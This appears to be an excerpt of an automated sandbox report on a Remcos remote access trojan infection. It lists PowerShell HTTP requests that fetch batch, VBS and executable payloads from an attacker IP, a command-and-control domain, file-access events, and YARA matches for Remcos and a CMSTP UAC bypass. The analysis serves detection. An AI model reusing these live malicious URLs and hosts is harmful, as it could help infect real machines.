                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\

                      Software Vulnerabilities

                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                      Networking

                      Source: Malware configuration extractorURLs: fullimmersion777.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Length: 4809996Last-Modified: Wed, 25 Sep 2024 11:52:30 GMTContent-Type: application/x-msdownloadDate: Wed, 25 Sep 2024 16:40:27 GMTETag: "f30293f7a768b837cdb37fc8b138e7a1-1727265150-4809996"Accept-Ranges: bytesServer: WsgiDAV/4.3.3 Cheroot/10.0.1 Python/3.12.2
                      Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                      Source: global trafficHTTP traffic detected: GET /hello.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /ffo.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /hi.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /AUGUST.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 172.94.3.25Connection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 172.94.3.25
                      Source: DZIPR.exe.17.drString found in binary or memory: support@datanumen.com+https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm"Total page file memory: %.0n bytes!Free page file memory: %.0n bytes Total virtual memory: %.0n bytes equals www.facebook.com (Facebook)
                      Source: Dlr7HYI6VL.lnkString found in binary or memory: http://172.94.3.25/hello.bat
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                      Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://support.datanumen.com
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.0000000003588000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EB5000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.00000000057CD000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004DEB000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.0000000004982000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004E98000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004D5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                      Source: DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: http://www.repairfile.com
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
                      Source: svchost.exe, 00000015.00000003.2438441779.000002061F05E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000015.00000003.2438441779.000002061F000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/%https://www.datanumen.com/zip-repair/
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/contact/0https://www.datanumen.com/update/dzipr/dzipr.inf
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/support/
                      Source: DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/zip-repair-order/2https://www.datanumen.com/socialmedia/facebook.htm
                      Source: AUGUST.exe, 00000010.00000003.2318798588.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp, AUGUST.exe, 00000010.00000003.2320949516.0000000002430000.00000004.00001000.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000003.2327861326.0000000003EE6000.00000004.00000001.00020000.00000000.sdmp, DZIPR.exe.17.drString found in binary or memory: https://www.datanumen.com/zip-repair/
                      Source: DZIPR.exe, 00000011.00000002.2343454264.000000000348B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.c
                      Source: DZIPR.exe, 00000011.00000002.2343813669.00000000035DF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647144627.0000000004EFE000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758525091.0000000005816000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648103651.0000000004E34000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929106731.00000000049CB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758378104.0000000004EE1000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929002610.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA504EE GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageW, 17_2_6FA504EE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

                      E-Banking Fraud

                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 6600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 2720, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 1460, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 3004, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5388, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4924, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\qapuwvr, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\gps, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\demhwk, type: DROPPED

                      System Summary

                      Source: 24.2.cmd.exe.5862757.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.5861b57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.4e80757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.DZIPR.exe.362a9ce.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.4e7fb57.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.581ca8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.DZIPR.exe.362b5ce.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.explorer.exe.4ee7a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.cmd.exe.5db00c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 24.2.cmd.exe.5db00c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4f4a757.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4f04a8a.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 19.2.cmd.exe.59500c8.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.cmd.exe.4f49b57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.explorer.exe.4f2cb57.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.49d1a8a.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 30.2.explorer.exe.4f2d757.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.explorer.exe.4daca8a.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.4a17757.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.4a16b57.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 28.2.cmd.exe.50100c8.7.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 26.2.explorer.exe.4e3aa8a.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.explorer.exe.4df2757.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 31.2.explorer.exe.4df1b57.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 17.2.DZIPR.exe.35e5901.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000001A.00000002.2647625743.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001F.00000002.2928479107.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000001E.00000002.2757772777.0000000000459000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
